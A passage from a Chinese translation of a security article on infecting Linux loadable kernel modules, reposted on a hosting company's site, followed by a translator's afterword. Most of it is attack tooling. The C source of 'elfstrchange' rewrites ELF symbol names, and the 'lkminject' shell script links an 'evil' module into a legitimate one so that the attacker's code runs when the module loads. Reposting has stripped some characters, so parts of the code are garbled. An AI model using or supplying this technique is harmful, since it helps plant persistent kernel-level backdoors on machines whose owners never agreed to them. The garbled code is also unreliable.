LoadableKernelModules注射

exit (EXIT_FAILURE);
}
symoffset = ElfGetSymbolByName (fd, &symtab, &strtab, argv[2], &sym);
if (symoffset == -1)
{
fprintf (stderr, "Symbol %s not foundn", argv[2]);
exit (EXIT_FAILURE);
}
printf ("[ ] Symbol %s located at 0x%xn", argv[2], symoffset); if (fseek (fd, symoffset, SEEK_SET) == -1)
FATAL ("fseek"); if (fwrite (argv[3], 1, strlen(argv[3]), fd) < strlen (argv[3]))
FATAL ("fwrite"); printf ("[ ] .strtab entry overwriten with %sn", argv[3]); fclose (fd); return EXIT_SUCCESS;
} Elf32_Off ElfGetSymbolByName (FILE *fd, Elf32_Shdr *symtab,
Elf32_Shdr *strtab, char *name, Elf32_Sym *sym)
{
int i;
char symname[255];
Elf32_Off offset; for (i=0; i<(symtab->sh_size/symtab->sh_entsize); i )
{
if (fseek (fd, symtab->sh_offset (i * symtab->sh_entsize),
SEEK_SET) == -1)
FATAL ("fseek"); if (fread (sym, sizeof (Elf32_Sym), 1, fd) < 1)
FATAL ("Symtab corrupted"); memset (symname, 0, sizeof (symname));
offset = ElfGetSymbolName (fd, sym->st_name,
strtab, symname, sizeof (symname));
if (!strcmp (symname, name))
return offset;
} return -1;
}
int ElfGetSectionByIndex (FILE *fd, Elf32_Ehdr *ehdr, Elf32_Half index,
Elf32_Shdr *shdr)
{
if (fseek (fd, ehdr->e_shoff (index * ehdr->e_shentsize),
SEEK_SET) == -1)
FATAL ("fseek"); if (fread (shdr, sizeof (Elf32_Shdr), 1, fd) < 1)
FATAL ("Sections header corrupted"); return 0;
}
int ElfGetSectionByName (FILE *fd, Elf32_Ehdr *ehdr, char *section,
Elf32_Shdr *shdr)
{
int i;
char name[255];
Elf32_Shdr shstrtable; /*
* Get the section header string table
*/
ElfGetSectionByIndex (fd, ehdr, ehdr->e_shstrndx, &shstrtable); memset (name, 0, sizeof (name)); for (i=0; i<ehdr->e_shnum; i )
{
if (fseek (fd, ehdr->e_shoff (i * ehdr->e_shentsize),
SEEK_SET) == -1)
FATAL ("fseek"); if (fread (shdr, sizeof (Elf32_Shdr), 1, fd) < 1)
FATAL ("Sections header corrupted"); ElfGetSectionName (fd, shdr->sh_name, &shstrtable,
name, sizeof (name));
if (!strcmp (name, section))
{
return 0;
}
}
return -1;
}
int ElfGetSectionName (FILE *fd, Elf32_Word sh_name,
Elf32_Shdr *shstrtable, char *res, size_t len)
{
size_t i = 0; if (fseek (fd, shstrtable->sh_offset sh_name, SEEK_SET) == -1)
FATAL ("fseek"); while ((i < len)
*res == ')
{
*res = fgetc (fd);
i ;
res ;
} return 0;
}
Elf32_Off ElfGetSymbolName (FILE *fd, Elf32_Word sym_name,
Elf32_Shdr *strtable, char *res, size_t len)
{
size_t i = 0; if (fseek (fd, strtable->sh_offset sym_name, SEEK_SET) == -1)
FATAL ("fseek"); while ((i < len)
*res == ')
{
*res = fgetc (fd);
i ;
res ;
} return (strtable->sh_offset sym_name);
}
/* EOF */ ----] 9.2 Lkminject #!/bin/sh
#
# lkminject by truff (truff@projet7.org)
#
# Injects a Linux lkm into another one.
#
# Usage:
# ./lkminfect.sh original_lkm.o evil_lkm.c
#
# Notes:
# You have to modify evil_lkm.c as explained bellow:
# In the init_module code, you have to insert this line, just after
# variables init:
# dumm_module ();
#
# In the cleanup_module code, you have to insert this line, just after
# variables init:
# dummcle_module ();
#
#
http://www.projet7.org" - Security Researchs -
###########################################################################
sed -e s/init_module/evil_module/ $2 > tmp
mv tmp $2 sed -e s/cleanup_module/evclean_module/ $2 > tmp
mv tmp $2 # Replace the following line with the compilation line for your evil lkm
# if needed.
make ld -r $1 $(basename $2 .c).o -o evil.o .../elfstrchange evil.o init_module dumm_module
.../elfstrchange evil.o evil_module init_module
.../elfstrchange evil.o cleanup_module dummcle_module
.../elfstrchange evil.o evclean_module cleanup_module mv evil.o $1
rm elfstrchange |=[ EOF ]=---------------------------------------------------------------=| 译者的话: 这篇文章总的来说还是比较容易懂的. 原文标题是<感染LKM>. 旅团的Bytes兄弟说
不如"注射"来得贴切, 采纳之. 感谢alert7大哥的建议, 保留了section的专有名称. 感谢各位
旅团兄弟的支持. 最后感谢chaton, 我占用了她的老公好几天^_^ 关闭本页

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!